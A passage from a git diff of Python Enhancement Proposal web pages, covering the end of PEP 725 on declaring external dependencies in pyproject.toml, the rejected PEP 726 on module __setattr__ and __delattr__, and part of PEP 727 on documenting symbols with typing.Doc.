+

The scheme component is a fixed string, pkg, and of the other +components only type and name are required. As an example, a package +URL for the requests package on PyPI would be:

+
pkg:pypi/requests
+
+
+

Adopting PURL to specify external dependencies in pyproject.toml solves a +number of problems at once - and there are already implementations of the +specification in Python and multiple languages. PURL is also already supported +by dependency-related tooling like SPDX (see +External Repository Identifiers in the SPDX 2.3 spec), +the Open Source Vulnerability format, +and the Sonatype OSS Index; +not having to wait years before support in such tooling arrives is valuable.

+

For concrete packages without a canonical package manager to refer to, either +pkg:generic/pkg-name can be used, or a direct reference to the VCS system +that the package is maintained in (e.g., +pkg:github/user-or-org-name/pkg-name). Which of these is more appropriate +is situation-dependent. This PEP recommends using pkg:generic when the +package name is unambiguous and well-known (e.g., pkg:generic/git or +pkg:generic/openblas), and using the VCS as the PURL type otherwise.

+
+
+

Virtual package specification

+

There is no ready-made support for virtual packages in PURL or another +standard. There are a relatively limited number of such dependencies though, +and adopting a scheme similar to PURL but with the virtual: rather than +pkg: scheme seems like it will be understandable and map well to Linux +distros with virtual packages and to the likes of Conda and Spack.

+

The two known virtual package types are compiler and interface.

+
+
+

Versioning

+

Support in PURL for version expressions and ranges beyond a fixed version is +still pending, see the Open Issues section.

+
+
+

Dependency specifiers

+

Regular Python dependency specifiers (as originally defined in PEP 508) may +be used behind PURLs. PURL qualifiers, which use ? followed by a package +type-specific dependency specifier component, must not be used. The reason for +this is pragmatic: dependency specifiers are already used for other metadata in +pyproject.toml, any tooling that is used with pyproject.toml is likely +to already have a robust implementation to parse it. And we do not expect to +need the extra possibilities that PURL qualifiers provide (e.g. to specify a +Conan or Conda channel, or a RubyGems platform).

+
+
+
+

Usage of core metadata fields

+

The core metadata specification contains one relevant field, namely +Requires-External. This has no well-defined semantics in core metadata 2.1; +this PEP chooses to reuse the field for external runtime dependencies. The core +metadata specification does not contain fields for any metadata in +pyproject.toml’s [build-system] table. Therefore the build-requires +and host-requires content also does not need to be reflected in core +metadata fields. The optional-dependencies content from [external] +would need to either reuse Provides-Extra or require a new +Provides-External-Extra field. Neither seems desirable.

+
+

Differences between sdist and wheel metadata

+

A wheel may vendor its external dependencies. This happens in particular when +distributing wheels on PyPI or other Python package indexes - and tools like +auditwheel, delvewheel and delocate automate this process. As a result, a +Requires-External entry in an sdist may disappear from a wheel built from +that sdist. It is also possible that a Requires-External entry remains in a +wheel, either unchanged or with narrower constraints. auditwheel does not +vendor certain allow-listed dependencies, such as OpenGL, by default. In +addition, auditwheel and delvewheel allow a user to manually exclude +dependencies via a --exclude or --no-dll command-line flag. This is +used to avoid vendoring large shared libraries, for example those from CUDA.

+

Requires-External entries generated from external dependencies in +pyproject.toml in a wheel are therefore allowed to be narrower than those +for the corresponding sdist. They must not be wider, i.e. constraints must not +allow a version of a dependency for a wheel that isn’t allowed for an sdist, +nor contain new dependencies that are not listed in the sdist’s metadata at +all.

+
+
+

Canonical names of dependencies and -dev(el) split packages

+

It is fairly common for distros to split a package into two or more packages. +In particular, runtime components are often separately installable from +development components (headers, pkg-config and CMake files, etc.). The latter +then typically has a name with -dev or -devel appended to the +project/library name. This split is the responsibility of each distro to +maintain, and should not be reflected in the [external] table. It is not +possible to specify this in a reasonable way that works across distros, hence +only the canonical name should be used in [external].

+

The intended meaning of using a PURL or virtual dependency is “the full package +with the name specified”. It will depend on the context in which the metadata +is used whether the split is relevant. For example, if libffi is a host +dependency and a tool wants to prepare an environment for building a wheel, +then if a distro has split off the headers for libffi into a +libffi-devel package then the tool has to install both libffi and +libffi-devel.

+
+
+

Python development headers

+

Python headers and other build support files may also be split. This is the +same situation as in the section above (because Python is simply a regular +package in distros). However, a python-dev|devel dependency is special because +in pyproject.toml Python itself is an implicit rather than an explicit +dependency. Hence a choice needs to be made here - add python-dev implicitly, +or make each package author add it explicitly under [external]. For +consistency between Python dependencies and external dependencies, we choose to +add it implicitly. Python development headers must be assumed to be necessary +when an [external] table contains one or more compiler packages.

+
+
+
+
+

Specification

+

If metadata is improperly specified then tools MUST raise an error to notify +the user about their mistake.

+
+

Details

+

Note that pyproject.toml content is in the same format as in PEP 621.

+
+

Table name

+

Tools MUST specify fields defined by this PEP in a table named [external]. +No tools may add fields to this table which are not defined by this PEP or +subsequent PEPs. The lack of an [external] table means the package either +does not have any external dependencies, or the ones it does have are assumed +to be present on the system already.

+
+
+

build-requires/optional-build-requires

+
    +
  • Format: Array of PURL strings (build-requires) and a table +with values of arrays of PURL strings (optional-build-requires)
  • +
  • Core metadata: N/A
  • +
+

The (optional) external build requirements needed to build the project.

+

For build-requires, it is a key whose value is an array of strings. Each +string represents a build requirement of the project and MUST be formatted as +either a valid PURL string or a virtual: string.

+

For optional-build-requires, it is a table where each key specifies an +extra set of build requirements and whose value is an array of strings. The +strings of the arrays MUST be valid PURL strings.

+
+
+

host-requires/optional-host-requires

+
    +
  • Format: Array of PURL strings (host-requires) and a table +with values of arrays of PURL strings (optional-host-requires)
  • +
  • Core metadata: N/A
  • +
+

The (optional) external host requirements needed to build the project.

+

For host-requires, it is a key whose value is an array of strings. Each +string represents a host requirement of the project and MUST be formatted as +either a valid PURL string or a virtual: string.

+

For optional-host-requires, it is a table where each key specifies an +extra set of host requirements and whose value is an array of strings. The +strings of the arrays MUST be valid PURL strings.

+
+
+

dependencies/optional-dependencies

+
    +
  • Format: Array of PURL strings (dependencies) and a table +with values of arrays of PURL strings (optional-dependencies)
  • +
  • Core metadata: Requires-External, N/A
  • +
+

The (optional) runtime dependencies of the project.

+

For dependencies, it is a key whose value is an array of strings. Each +string represents a dependency of the project and MUST be formatted as either a +valid PURL string or a virtual: string. Each string maps directly to a +Requires-External entry in the core metadata.

+

For optional-dependencies, it is a table where each key specifies an extra +and whose value is an array of strings. The strings of the arrays MUST be valid +PURL strings. Optional dependencies do not map to a core metadata field.

+
+
+
+

Examples

+

These examples show what the [external] content for a number of packages is +expected to be.

+

cryptography 39.0:

+
[external]
+build-requires = [
+  "virtual:compiler/c",
+  "virtual:compiler/rust",
+  "pkg:generic/pkg-config",
+]
+host-requires = [
+  "pkg:generic/openssl",
+  "pkg:generic/libffi",
+]
+
+
+

SciPy 1.10:

+
[external]
+build-requires = [
+  "virtual:compiler/c",
+  "virtual:compiler/cpp",
+  "virtual:compiler/fortran",
+  "pkg:generic/ninja",
+  "pkg:generic/pkg-config",
+]
+host-requires = [
+  "virtual:interface/blas",
+  "virtual:interface/lapack",  # >=3.7.1 (can't express version ranges with PURL yet)
+]
+
+
+

Pillow 10.1.0:

+
[external]
+build-requires = [
+  "virtual:compiler/c",
+]
+host-requires = [
+  "pkg:generic/libjpeg",
+  "pkg:generic/zlib",
+]
+
+[external.optional-host-requires]
+extra = [
+  "pkg:generic/lcms2",
+  "pkg:generic/freetype",
+  "pkg:generic/libimagequant",
+  "pkg:generic/libraqm",
+  "pkg:generic/libtiff",
+  "pkg:generic/libxcb",
+  "pkg:generic/libwebp",
+  "pkg:generic/openjpeg",  # add >=2.0 once we have version specifiers
+  "pkg:generic/tk",
+]
+
+
+

NAVis 1.4.0:

+
[project.optional-dependencies]
+r = ["rpy2"]
+
+[external]
+build-requires = [
+  "pkg:generic/XCB; platform_system=='Linux'",
+]
+
+[external.optional-dependencies]
+nat = [
+  "pkg:cran/nat",
+  "pkg:cran/nat.nblast",
+]
+
+
+

Spyder 6.0:

+
[external]
+dependencies = [
+  "pkg:cargo/ripgrep",
+  "pkg:cargo/tree-sitter-cli",
+  "pkg:golang/github.com/junegunn/fzf",
+]
+
+
+

jupyterlab-git 0.41.0:

+
[external]
+dependencies = [
+  "pkg:generic/git",
+]
+
+[external.optional-build-requires]
+dev = [
+  "pkg:generic/nodejs",
+]
+
+
+

PyEnchant 3.2.2:

+
[external]
+dependencies = [
+  # libenchant is needed on all platforms but only vendored into wheels on
+  # Windows, so on Windows the build backend should remove this external
+  # dependency from wheel metadata.
+  "pkg:github/AbiWord/enchant",
+]
+
+
+
+
+
+

Backwards Compatibility

+

There is no impact on backwards compatibility, as this PEP only adds new, +optional metadata. In the absence of such metadata, nothing changes for package +authors or packaging tooling.

+
+
+

Security Implications

+

There are no direct security concerns as this PEP covers how to statically +define metadata for external dependencies. Any security issues would stem from +how tools consume the metadata and choose to act upon it.

+
+
+

How to Teach This

+

External dependencies and if and how those external dependencies are vendored +are topics that are typically not understood in detail by Python package +authors. We intend to start from how an external dependency is defined, the +different ways it can be depended on—from runtime-only with ctypes or a +subprocess call to it being a build dependency that’s linked against— +before going into how to declare external dependencies in metadata. The +documentation should make explicit what is relevant for package authors, and +what for distro packagers.

+

Material on this topic will be added to the most relevant packaging tutorials, +primarily the Python Packaging User Guide. In addition, we expect that any +build backend that adds support for external dependencies metadata will include +information about that in its documentation, as will tools like auditwheel.

+
+
+

Reference Implementation

+

This PEP contains a metadata specification, rather that a code feature - hence +there will not be code implementing the metadata spec as a whole. However, +there are parts that do have a reference implementation:

+
    +
  1. The [external] table has to be valid TOML and therefore can be loaded +with tomllib.
  2. +
  3. The PURL specification, as a key part of this spec, has a Python package +with a reference implementation for constructing and parsing PURLs: +packageurl-python.
  4. +
+

There are multiple possible consumers and use cases of this metadata, once +that metadata gets added to Python packages. Tested metadata for all of the +top 150 most-downloaded packages from PyPI with published platform-specific +wheels can be found in rgommers/external-deps-build. This metadata has +been validated by using it to build wheels from sdists patched with that +metadata in clean Docker containers.

+
+
+

Rejected Ideas

+
+

Specific syntax for external dependencies which are also packaged on PyPI

+

There are non-Python packages which are packaged on PyPI, such as Ninja, +patchelf and CMake. What is typically desired is to use the system version of +those, and if it’s not present on the system then install the PyPI package for +it. The authors believe that specific support for this scenario is not +necessary (or too complex to justify such support); a dependency provider for +external dependencies can treat PyPI as one possible source for obtaining the +package.

+
+
+

Using library and header names as external dependencies

+

A previous draft PEP (“External dependencies” (2015)) +proposed using specific library and header names as external dependencies. This +is too granular; using package names is a well-established pattern across +packaging ecosystems and should be preferred.

+
+
+
+

Open Issues

+
+

Version specifiers for PURLs

+

Support in PURL for version expressions and ranges is still pending. The pull +request at vers implementation for PURL seems close to being merged, at +which point this PEP could adopt it.

+
+
+

Versioning of virtual dependencies

+

Once PURL supports version expressions, virtual dependencies can be versioned +with the same syntax. It must be better specified however what the version +scheme is, because this is not as clear for virtual dependencies as it is for +PURLs (e.g., there can be multiple implementations, and abstract interfaces may +not be unambiguously versioned). E.g.:

+
    +
  • OpenMP: has regular MAJOR.MINOR versions of its standard, so would look +like >=4.5.
  • +
  • BLAS/LAPACK: should use the versioning used by Reference LAPACK, which +defines what the standard APIs are. Uses MAJOR.MINOR.MICRO, so would look +like >=3.10.0.
  • +
  • Compilers: these implement language standards. For C, C++ and Fortran these +are versioned by year. In order for versions to sort correctly, we choose to +use the full year (four digits). So “at least C99” would be >=1999, and +selecting C++14 or Fortran 77 would be ==2014 or ==1977 respectively. +Other languages may use different versioning schemes. These should be +described somewhere before they are used in pyproject.toml.
  • +
+

A logistical challenge is where to describe the versioning - given that this +will evolve over time, this PEP itself is not the right location for it. +Instead, this PEP should point at that (to be created) location.

+
+
+

Who defines canonical names and canonical package structure?

+

Similarly to the logistics around versioning is the question about what names +are allowed and where they are described. And then who is in control of that +description and responsible for maintaining it. Our tentative answer is: there +should be a central list for virtual dependencies and pkg:generic PURLs, +maintained as a PyPA project. See +https://discuss.python.org/t/pep-725-specifying-external-dependencies-in-pyproject-toml/31888/62. +TODO: once that list/project is prototyped, include it in the PEP and close +this open issue.

+
+
+

Syntax for virtual dependencies

+

The current syntax this PEP uses for virtual dependencies is +virtual:type/name, which is analogous to but not part of the PURL spec. +This open issue discusses supporting virtual dependencies within PURL: +purl-spec#222.

+
+
+

Should a host-requires key be added under [build-system]?

+

Adding host-requires for host dependencies that are on PyPI in order to +better support name mapping to other packaging systems with support for +cross-compiling may make sense. +This issue tracks this topic +and has arguments in favor and against adding host-requires under +[build-system] as part of this PEP.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0725.rst

+

Last modified: 2023-12-06 20:48:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0726/index.html b/pep-0726/index.html new file mode 100644 index 00000000000..22146cf902b --- /dev/null +++ b/pep-0726/index.html @@ -0,0 +1,405 @@ + + + + + + + + PEP 726 – Module __setattr__ and __delattr__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 726 – Module __setattr__ and __delattr__

+
+
Author:
+
Sergey B Kirpichev <skirpichev at gmail.com>
+
Sponsor:
+
Adam Turner <python at quite.org.uk>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Aug-2023
+
Python-Version:
+
3.13
+
Post-History:
+
06-Apr-2023, +31-Aug-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes supporting user-defined __setattr__ +and __delattr__ methods on modules to extend customization +of module attribute access beyond PEP 562.

+
+
+

Motivation

+

There are several potential uses of a module __setattr__:

+
    +
  1. To prevent setting an attribute at all (i.e. make it read-only)
  2. +
  3. To validate the value to be assigned
  4. +
  5. To intercept setting an attribute and update some other state
  6. +
+

Proper support for read-only attributes would also require adding the +__delattr__ function to prevent their deletion.

+

It would be convenient to directly support such customization, by recognizing +__setattr__ and __delattr__ methods defined in a module that would act +like normal object.__setattr__() and +object.__delattr__() methods, except that they will be defined +on module instances. Together with existing __getattr__ and __dir__ +methods this will streamline all variants of customizing module attribute access.

+

For example

+
# mplib.py
+
+CONSTANT = 3.14
+prec = 53
+dps = 15
+
+def dps_to_prec(n):
+    """Return the number of bits required to represent n decimals accurately."""
+    return max(1, int(round((int(n)+1)*3.3219280948873626)))
+
+def prec_to_dps(n):
+    """Return the number of accurate decimals that can be represented with n bits."""
+    return max(1, int(round(int(n)/3.3219280948873626)-1))
+
+def validate(n):
+    n = int(n)
+    if n <= 0:
+        raise ValueError('Positive integer expected')
+    return n
+
+def __setattr__(name, value):
+    if name == 'CONSTANT':
+        raise AttributeError('Read-only attribute!')
+    if name == 'dps':
+        value = validate(value)
+        globals()['dps'] = value
+        globals()['prec'] = dps_to_prec(value)
+        return
+    if name == 'prec':
+        value = validate(value)
+        globals()['prec'] = value
+        globals()['dps'] = prec_to_dps(value)
+        return
+    globals()[name] = value
+
+def __delattr__(name):
+    if name in ('CONSTANT', 'dps', 'prec'):
+        raise AttributeError('Read-only attribute!')
+    del globals()[name]
+
+
+
>>> import mplib
+>>> mplib.foo = 'spam'
+>>> mplib.CONSTANT = 42
+Traceback (most recent call last):
+  ...
+AttributeError: Read-only attribute!
+>>> del mplib.foo
+>>> del mplib.CONSTANT
+Traceback (most recent call last):
+  ...
+AttributeError: Read-only attribute!
+>>> mplib.prec
+53
+>>> mplib.dps
+15
+>>> mplib.dps = 5
+>>> mplib.prec
+20
+>>> mplib.dps = 0
+Traceback (most recent call last):
+  ...
+ValueError: Positive integer expected
+
+
+
+
+

Existing Options

+

The current workaround is assigning the __class__ of a module object to a +custom subclass of types.ModuleType (see [1]).

+

For example, to prevent modification or deletion of an attribute we could use:

+
# mod.py
+
+import sys
+from types import ModuleType
+
+CONSTANT = 3.14
+
+class ImmutableModule(ModuleType):
+    def __setattr__(name, value):
+        raise AttributeError('Read-only attribute!')
+
+    def __delattr__(name):
+        raise AttributeError('Read-only attribute!')
+
+sys.modules[__name__].__class__ = ImmutableModule
+
+
+

But this variant is slower (~2x) than the proposed solution. More +importantly, it also brings a noticeable speed regression (~2-3x) for +attribute access.

+
+
+

Specification

+

The __setattr__ function at the module level should accept two +arguments, the name of an attribute and the value to be assigned, +and return None or raise an AttributeError.

+
def __setattr__(name: str, value: typing.Any, /) -> None: ...
+
+
+

The __delattr__ function should accept one argument, +the name of an attribute, and return None or raise an +AttributeError:

+
def __delattr__(name: str, /) -> None: ...
+
+
+

The __setattr__ and __delattr__ functions are looked up in the +module __dict__. If present, the appropriate function is called to +customize setting the attribute or its deletion, else the normal +mechanism (storing/deleting the value in the module dictionary) will work.

+

Defining module __setattr__ or __delattr__ only affects lookups made +using the attribute access syntax — directly accessing the module globals +(whether by globals() within the module, or via a reference to the module’s +globals dictionary) is unaffected. For example:

+
>>> import mod
+>>> mod.__dict__['foo'] = 'spam'  # bypasses __setattr__, defined in mod.py
+
+
+

or

+
# mod.py
+
+def __setattr__(name, value):
+   ...
+
+foo = 'spam'  # bypasses __setattr__
+globals()['bar'] = 'spam'  # here too
+
+def f():
+    global x
+    x = 123
+
+f()  # and here
+
+
+

To use a module global and trigger __setattr__ (or __delattr__), +one can access it via sys.modules[__name__] within the module’s code:

+
# mod.py
+
+sys.modules[__name__].foo = 'spam'  # bypasses __setattr__
+
+def __setattr__(name, value):
+    ...
+
+sys.modules[__name__].bar = 'spam'  # triggers __setattr__
+
+
+

This limitation is intentional (just as for the PEP 562), because the +interpreter highly optimizes access to module globals and disabling all that +and going through special methods written in Python would slow down the code +unacceptably.

+
+
+

How to Teach This

+

The “Customizing module attribute access” [1] section of the documentation +will be expanded to include new functions.

+
+
+

Reference Implementation

+

The reference implementation for this PEP can be found in CPython PR #108261.

+
+
+

Backwards compatibility

+

This PEP may break code that uses module level (global) names +__setattr__ and __delattr__, but the language reference +explicitly reserves all undocumented dunder names, and allows +“breakage without warning” [2].

+

The performance implications of this PEP are small, since additional +dictionary lookup is much cheaper than storing/deleting the value in +the dictionary. Also it is hard to imagine a module that expects the +user to set (and/or delete) attributes enough times to be a +performance concern. On another hand, proposed mechanism allows to +override setting/deleting of attributes without affecting speed of +attribute access, which is much more likely scenario to get a +performance penalty.

+
+
+

Discussion

+

As pointed out by Victor Stinner, the proposed API could be useful already in +the stdlib, for example to ensure that sys.modules type is always a +dict:

+
>>> import sys
+>>> sys.modules = 123
+>>> import asyncio
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<frozen importlib._bootstrap>", line 1260, in _find_and_load
+AttributeError: 'int' object has no attribute 'get'
+
+
+

or to prevent deletion of critical sys attributes, which makes the +code more complicated. For example, code using sys.stderr has to +check if the attribute exists and if it’s not None. Currently, it’s +possible to remove any sys attribute, including functions:

+
>>> import sys
+>>> del sys.excepthook
+>>> 1+  # notice the next line
+sys.excepthook is missing
+ File "<stdin>", line 1
+   1+
+    ^
+SyntaxError: invalid syntax
+
+
+

See related issue for +other details.

+

Other stdlib modules also come with attributes which can be overridden (as a +feature) and some input validation here could be helpful. Examples: +threading.excepthook, warnings.showwarning, +io.DEFAULT_BUFFER_SIZE or os.SEEK_SET.

+

Also a typical use case for customizing module attribute access is managing +deprecation warnings. But the PEP 562 accomplishes this scenario only +partially: e.g. it’s impossible to issue a warning during an attempt to +change a renamed attribute.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0726.rst

+

Last modified: 2024-02-28 23:47:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0727/index.html b/pep-0727/index.html new file mode 100644 index 00000000000..0598d6966e5 --- /dev/null +++ b/pep-0727/index.html @@ -0,0 +1,813 @@ + + + + + + + + PEP 727 – Documentation in Annotated Metadata | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 727 – Documentation in Annotated Metadata

+
+
Author:
+
Sebastián Ramírez <tiangolo at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
28-Aug-2023
+
Python-Version:
+
3.13
+
Post-History:
+
30-Aug-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a standardized way to provide documentation strings for Python +symbols defined with Annotated using a new class +typing.Doc.

+
+
+

Motivation

+

There’s already a well-defined way to provide documentation for classes, +functions, class methods, and modules: using docstrings.

+

Currently there is no formalized standard to provide documentation strings for other +types of symbols: parameters, return values, class-scoped variables (class variables +and instance variables), local variables, and type aliases.

+

Nevertheless, to allow documenting most of these additional symbols, several +conventions have been created as microsyntaxes inside of docstrings, and are +currently commonly used: Sphinx, numpydoc, Google, Keras, etc.

+

There are two scenarios in which these conventions would be supported by tools: for +authors, while editing the contents of the documentation strings and for users, +while rendering that content in some way (in documentation sites, tooltips +in editors, etc).

+

Because each of these conventions uses a microsyntax inside a string, when +editing those docstrings, editors can’t easily provide support for autocompletion, +inline errors for broken syntax, etc. Any type of editing support for these +conventions would be on top of the support for editing standard Python syntax.

+

When documenting parameters with current conventions, because the docstring is in +a different place in the code than the actual parameters and it requires +duplication of information (the parameter name) the information about +a parameter is easily in a place in the code quite far away from the +declaration of the actual parameter and it is disconnected from it. +This means it’s easy to refactor a function, remove a parameter, and forget to +remove its docs. The same happens when adding a new parameter: it’s easy to forget +to add the docstring for it.

+

And because of this same duplication of information (the parameter name) editors and +other tools need complex custom logic to check or ensure the consistency of the +parameters in the signature and in their docstring, or they simply don’t +fully support that.

+

As these existing conventions are different types of microsyntaxes inside of +strings, robustly parsing them for rendering requires complex logic that +needs to be implemented by the tools supporting them. Additionally, libraries +and tools don’t have a straightforward way to obtain the documentation for +each individual parameter or variable at runtime, without depending on a +specific docstring convention parser. Accessing the parameter documentation +strings at runtime would be useful, for example, for testing the contents +of each parameter’s documentation, to ensure consistency across several +similar functions, or to extract and expose that same parameter +documentation in some other way (e.g. an API with FastAPI, a CLI with Typer, etc).

+

Some of these previous formats tried to account for the lack of type annotations +in older Python versions by including typing information in the docstrings (e.g. +Sphinx, +numpydoc) +but now that information doesn’t need to be in docstrings as there is now an official +syntax for type annotations.

+
+
+

Rationale

+

This proposal intends to address these shortcomings by extending and complementing the +information in docstrings, keeping backwards compatibility with existing docstrings +(it doesn’t deprecate them), and doing it in a way that leverages the Python +language and structure, via type annotations with Annotated, and +a new class Doc in typing.

+

The reason why this would belong in the standard Python library instead of an +external package is because although the implementation would be quite trivial, +the actual power and benefit from it would come from being a standard, to facilitate +its usage from library authors and to provide a default way to document Python +symbols using Annotated. Some tool providers (at least VS Code +and PyCharm) have shown they would consider implementing support for this only if +it was a standard.

+

This doesn’t deprecate current usage of docstrings, docstrings should be considered +the preferred documentation method when available (not available in type aliases, +parameters, etc). +And docstrings would be complemented by this proposal for documentation specific to +the symbols that can be declared with Annotated +(currently only covered by the several available microsyntax conventions).

+

This should be relatively transparent to common developers (library users) unless +they manually open the source files from libraries adopting it.

+

It should be considered opt-in for library authors who would like to adopt it and +they should be free to decide to use it or not.

+

It would be only useful for libraries that are willing to use optional type hints.

+
+

Summary

+

Here’s a short summary of the features of this proposal in contrast to current +conventions:

+
    +
  • Editing would be already fully supported by default by any editor (current +or future) supporting Python syntax, including syntax errors, syntax +highlighting, etc.
  • +
  • Rendering would be relatively straightforward to implement by static tools +(tools that don’t need runtime execution), as the information can be extracted +from the AST they normally already create.
  • +
  • Deduplication of information: the name of a parameter would be defined in a single +place, not duplicated inside of a docstring.
  • +
  • Elimination of the possibility of having inconsistencies when removing a parameter +or class variable and forgetting to remove its documentation.
  • +
  • Minimization of the probability of adding a new parameter or class variable +and forgetting to add its documentation.
  • +
  • Elimination of the possibility of having inconsistencies between the name of a +parameter in the signature and the name in the docstring when it is renamed.
  • +
  • Access to the documentation string for each symbol at runtime, including existing +(older) Python versions.
  • +
  • A more formalized way to document other symbols, like type aliases, that could +use Annotated.
  • +
  • No microsyntax to learn for newcomers, it’s just Python syntax.
  • +
  • Parameter documentation inheritance for functions captured +by ParamSpec.
  • +
+
+
+
+

Specification

+

The main proposal is to introduce a new class, typing.Doc. +This class should only be used within Annotated annotations. +It takes a single positional-only string argument. It should be used to +document the intended meaning and use of the symbol declared using +Annotated.

+

For example:

+
from typing import Annotated, Doc
+
+class User:
+    name: Annotated[str, Doc("The user's name")]
+    age: Annotated[int, Doc("The user's age")]
+
+    ...
+
+
+

Annotated is normally used as a type annotation, in those cases, +any typing.Doc inside of it would document the symbol being annotated.

+

When Annotated is used to declare a type alias, typing.Doc +would then document the type alias symbol.

+

For example:

+
from typing import Annotated, Doc, TypeAlias
+
+from external_library import UserResolver
+
+CurrentUser: TypeAlias = Annotated[str, Doc("The current system user"), UserResolver()]
+
+def create_user(name: Annotated[str, Doc("The user's name")]): ...
+
+def delete_user(name: Annotated[str, Doc("The user to delete")]): ...
+
+
+

In this case, if a user imported CurrentUser, tools like editors could provide +a tooltip with the documentation string when a user hovers over that symbol, or +documentation tools could include the type alias with its documentation in their +generated output.

+

For tools extracting the information at runtime, they would normally use +get_type_hints() with the parameter include_extras=True, +and as Annotated is normalized (even with type aliases), this +would mean they should use the last typing.Doc available, if more than one is +used, as that is the last one used.

+

At runtime, typing.Doc instances have an attribute documentation with the +string passed to it.

+

When a function’s signature is captured by a ParamSpec, +any documentation strings associated with the parameters should be retained.

+

Any tool processing typing.Doc objects should interpret the string as +a docstring, and therefore should normalize whitespace +as if inspect.cleandoc() were used.

+

The string passed to typing.Doc should be of the form that would be a +valid docstring. +This means that f-strings and string operations should not be used. +As this cannot be enforced by the Python runtime, +tools should not rely on this behavior.

+

When tools providing rendering show the raw signature, they could allow +configuring if the whole raw Annotated code should be displayed, +but they should default to not include Annotated and its +internal code metadata, only the type of the symbols annotated. When those tools +support typing.Doc and rendering in other ways than just a raw signature, +they should show the string value passed to typing.Doc in a convenient way that +shows the relation between the documented symbol and the documentation string.

+

Tools providing rendering could allow ways to configure where to show the +parameter documentation and the prose docstring in different ways. Otherwise, they +could simply show the prose docstring first and then the parameter documentation second.

+
+

Examples

+

Class attributes may be documented:

+
from typing import Annotated, Doc
+
+class User:
+    name: Annotated[str, Doc("The user's name")]
+    age: Annotated[int, Doc("The user's age")]
+
+    ...
+
+
+

As can function or method parameters and return values:

+
from typing import Annotated, Doc
+
+def create_user(
+    name: Annotated[str, Doc("The user's name")],
+    age: Annotated[int, Doc("The user's age")],
+    cursor: DatabaseConnection | None = None,
+) -> Annotated[User, Doc("The created user after saving in the database")]:
+    """Create a new user in the system.
+
+    It needs the database connection to be already initialized.
+    """
+    pass
+
+
+
+
+
+

Backwards Compatibility

+

This proposal is fully backwards compatible with existing code and it doesn’t +deprecate existing usage of docstring conventions.

+

For developers that wish to adopt it before it is available in the standard library, +or to support older versions of Python, they can use typing_extensions and +import and use Doc from there.

+

For example:

+
from typing import Annotated
+from typing_extensions import Doc
+
+class User:
+    name: Annotated[str, Doc("The user's name")]
+    age: Annotated[int, Doc("The user's age")]
+
+    ...
+
+
+
+
+

Security Implications

+

There are no known security implications.

+
+
+

How to Teach This

+

The main mechanism of documentation should continue to be standard docstrings for +prose information, this applies to modules, classes, functions and methods.

+

For authors that want to adopt this proposal to add more granularity, they can use +typing.Doc inside of Annotated annotations for the symbols +that support it.

+

Library authors that wish to adopt this proposal while keeping backwards compatibility +with older versions of Python should use typing_extensions.Doc instead of +typing.Doc.

+
+
+

Reference Implementation

+

typing.Doc is implemented equivalently to:

+
class Doc:
+    def __init__(self, documentation: str, /):
+        self.documentation = documentation
+
+
+

It has been implemented in the typing_extensions package.

+
+
+

Survey of Other languages

+

Here’s a short survey of how other languages document their symbols.

+
+

Java

+

Java functions and their parameters are documented with +Javadoc, +a special format for comments put on top of the function definition. This would be +similar to Python current docstring microsyntax conventions (but only one).

+

For example:

+
/**
+* Returns an Image object that can then be painted on the screen.
+* The url argument must specify an absolute <a href="#{@link}">{@link URL}</a>. The name
+* argument is a specifier that is relative to the url argument.
+* <p>
+* This method always returns immediately, whether or not the
+* image exists. When this applet attempts to draw the image on
+* the screen, the data will be loaded. The graphics primitives
+* that draw the image will incrementally paint on the screen.
+*
+* @param  url  an absolute URL giving the base location of the image
+* @param  name the location of the image, relative to the url argument
+* @return      the image at the specified URL
+* @see         Image
+*/
+public Image getImage(URL url, String name) {
+  try {
+    return getImage(new URL(url, name));
+  } catch (MalformedURLException e) {
+    return null;
+  }
+}
+
+
+
+
+

JavaScript

+

Both JavaScript and TypeScript use a similar system to Javadoc.

+

JavaScript uses JSDoc.

+

For example:

+
/**
+* Represents a book.
+* @constructor
+* @param {string} title - The title of the book.
+* @param {string} author - The author of the book.
+*/
+function Book(title, author) {
+}
+
+
+
+
+

TypeScript

+

TypeScript has +its own JSDoc reference +with some variations.

+

For example:

+
// Parameters may be declared in a variety of syntactic forms
+/**
+* @param {string}  p1 - A string param.
+* @param {string=} p2 - An optional param (Google Closure syntax)
+* @param {string} [p3] - Another optional param (JSDoc syntax).
+* @param {string} [p4="test"] - An optional param with a default value
+* @returns {string} This is the result
+*/
+function stringsStringStrings(p1, p2, p3, p4) {
+    // TODO
+}
+
+
+
+
+

Rust

+

Rust uses another similar variation of a microsyntax in +Doc comments.

+

But it doesn’t have a particular well defined microsyntax structure to denote what +documentation refers to what symbol/parameter other than what can be inferred from +the pure Markdown.

+

For example:

+
#![crate_name = "doc"]
+
+/// A human being is represented here
+pub struct Person {
+   /// A person must have a name, no matter how much Juliet may hate it
+   name: String,
+}
+
+impl Person {
+   /// Returns a person with the name given them
+   ///
+   /// # Arguments
+   ///
+   /// * `name` - A string slice that holds the name of the person
+   ///
+   /// # Examples
+   ///
+   /// ```
+   /// // You can have rust code between fences inside the comments
+   /// // If you pass --test to `rustdoc`, it will even test it for you!
+   /// use doc::Person;
+   /// let person = Person::new("name");
+   /// ```
+   pub fn new(name: &str) -> Person {
+      Person {
+            name: name.to_string(),
+      }
+   }
+
+   /// Gives a friendly hello!
+   ///
